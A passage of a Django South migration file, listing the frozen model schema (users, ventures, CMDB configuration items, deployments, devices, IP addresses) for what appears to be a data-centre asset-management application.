'time_zone': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('<PASSWORD>', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'business.businesssegment': {
'Meta': {'object_name': 'BusinessSegment'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'business.department': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'Department'},
'icon': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'True', u'default': 'None', 'null': 'True', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'business.profitcenter': {
'Meta': {'object_name': 'ProfitCenter'},
'description': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'business.venture': {
'Meta': {'ordering': "(u'parent__symbol', u'symbol')", 'unique_together': "((u'parent', u'symbol'),)", 'object_name': 'Venture'},
'business_segment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.BusinessSegment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'data_center': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DataCenter']", 'null': 'True', 'blank': 'True'}),
'department': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.Department']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_infrastructure': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'margin_kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.MarginKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "u'child_set'", 'null': 'True', 'blank': 'True', 'to': "orm['business.Venture']"}),
'path': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'profit_center': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.ProfitCenter']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'show_in_ralph': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'symbol': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '32', 'blank': 'True'}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'business.venturerole': {
'Meta': {'ordering': "(u'parent__name', u'name')", 'unique_together': "((u'name', u'venture'),)", 'object_name': 'VentureRole'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '75'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "u'child_set'", 'null': 'True', 'blank': 'True', 'to': "orm['business.VentureRole']"}),
'path': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.Venture']"})
},
'cmdb.ci': {
'Meta': {'unique_together': "((u'content_type', u'object_id'),)", 'object_name': 'CI'},
'added_manually': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'barcode': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'business_service': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'layers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CILayer']", 'symmetrical': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'owners': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CIOwner']", 'through': "orm['cmdb.CIOwnership']", 'symmetrical': 'False'}),
'pci_scope': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'relations': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CI']", 'through': "orm['cmdb.CIRelation']", 'symmetrical': 'False'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '11'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '11'}),
'technical_service': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIType']"}),
'uid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'zabbix_id': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'})
},
'cmdb.cilayer': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'CILayer'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'connected_types': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CIType']", 'symmetrical': 'False', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'icon': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'True', u'default': 'None', 'null': 'True', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'cmdb.ciowner': {
'Meta': {'object_name': 'CIOwner'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'profile': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['account.Profile']", 'unique': 'True'})
},
'cmdb.ciownership': {
'Meta': {'object_name': 'CIOwnership'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'ci': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CI']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIOwner']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'cmdb.cirelation': {
'Meta': {'unique_together': "((u'parent', u'child', u'type'),)", 'object_name': 'CIRelation'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'child': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'child'", 'to': "orm['cmdb.CI']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'parent'", 'to': "orm['cmdb.CI']"}),
'readonly': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.IntegerField', [], {'max_length': '11'})
},
'cmdb.citype': {
'Meta': {'object_name': 'CIType'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'icon_class': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.SlugField', [], {'max_length': '50'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'deployment.archiveddeployment': {
'Meta': {'ordering': "(u'-created',)", 'object_name': 'ArchivedDeployment'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.Device']"}),
'device_environment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'done_plugins': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'is_running': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mac': (u'lck.django.common.models.MACAddressField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', 'null': 'False', 'db_index': 'False'}),
'mass_deployment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.MassDeployment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'status_lastchanged': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'venture_role': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.VentureRole']", 'null': 'True', 'on_delete': 'models.SET_NULL'})
},
'deployment.deployment': {
'Meta': {'ordering': "(u'-created',)", 'object_name': 'Deployment'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.Device']"}),
'device_environment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'done_plugins': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'is_running': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mac': (u'lck.django.common.models.MACAddressField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', 'null': 'False', 'db_index': 'False'}),
'mass_deployment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.MassDeployment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'status_lastchanged': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'venture_role': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.VentureRole']", 'null': 'True', 'on_delete': 'models.SET_NULL'})
},
'deployment.deploymentpoll': {
'Meta': {'object_name': 'DeploymentPoll'},
'checked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'deployment.massdeployment': {
'Meta': {'ordering': "(u'-created',)", 'object_name': 'MassDeployment'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'csv': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'generated_csv': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_done': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'})
},
'deployment.preboot': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'Preboot'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'files': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['deployment.PrebootFile']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'deployment.prebootfile': {
'Meta': {'object_name': 'PrebootFile'},
'description': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'ftype': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', u'default': '101', 'null': 'False', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'raw_config': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'discovery.connection': {
'Meta': {'object_name': 'Connection'},
'connection_type': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inbound': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'inbound_connections'", 'on_delete': 'models.PROTECT', 'to': "orm['discovery.Device']"}),
'outbound': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'outbound_connections'", 'on_delete': 'models.PROTECT', 'to': "orm['discovery.Device']"})
},
'discovery.datacenter': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'DataCenter'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'discovery.deprecationkind': {
'Meta': {'object_name': 'DeprecationKind'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'months': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'})
},
'discovery.device': {
'Meta': {'object_name': 'Device'},
'barcode': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'boot_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'cached_cost': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'cached_price': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'chassis_position': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'connections': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['discovery.Device']", 'through': "orm['discovery.Connection']", 'symmetrical': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dc': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'deprecation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deprecation_kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.DeprecationKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'device_environment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'diag_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hard_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'logical_parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'logicalchild_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.Device']", 'blank': 'True', 'null': 'True'}),
'management': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'managed_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.IPAddress']", 'blank': 'True', 'null': 'True'}),
'margin_kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.MarginKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'max_save_priority': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'mgmt_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'model': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'device_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.DeviceModel']", 'blank': 'True', 'null': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name2': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'child_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.Device']", 'blank': 'True', 'null': 'True'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'price': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'purchase_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'rack': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'save_priorities': ('django.db.models.fields.TextField', [], {'default': "u''"}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'sn': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'support_expiration_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'support_kind': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'uptime_seconds': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'uptime_timestamp': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture_role': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.VentureRole']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'warranty_expiration_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'discovery.devicemodel': {
'Meta': {'object_name': 'DeviceModel'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'chassis_size': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_save_priority': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'save_priorities': ('django.db.models.fields.TextField', [], {'default': "u''"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {'default': '401'})
},
'discovery.discoveryqueue': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'DiscoveryQueue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'discovery.environment': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'Environment'},
'data_center': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DataCenter']"}),
'domain': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hosts_naming_template': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'next_server': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '32', 'blank': 'True'}),
'queue': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DiscoveryQueue']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'discovery.ipaddress': {
'Meta': {'object_name': 'IPAddress'},
'address': ('django.db.models.fields.IPAddressField', [], {'default': 'None', 'max_length': '15', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dead_ping_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.Device']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'dns_info': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'http_family': ('django.db.models.fields.TextField', [], {'default': 'None', 'max_length': '64', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_buried': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_management': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_plugins': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'last_puppet': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
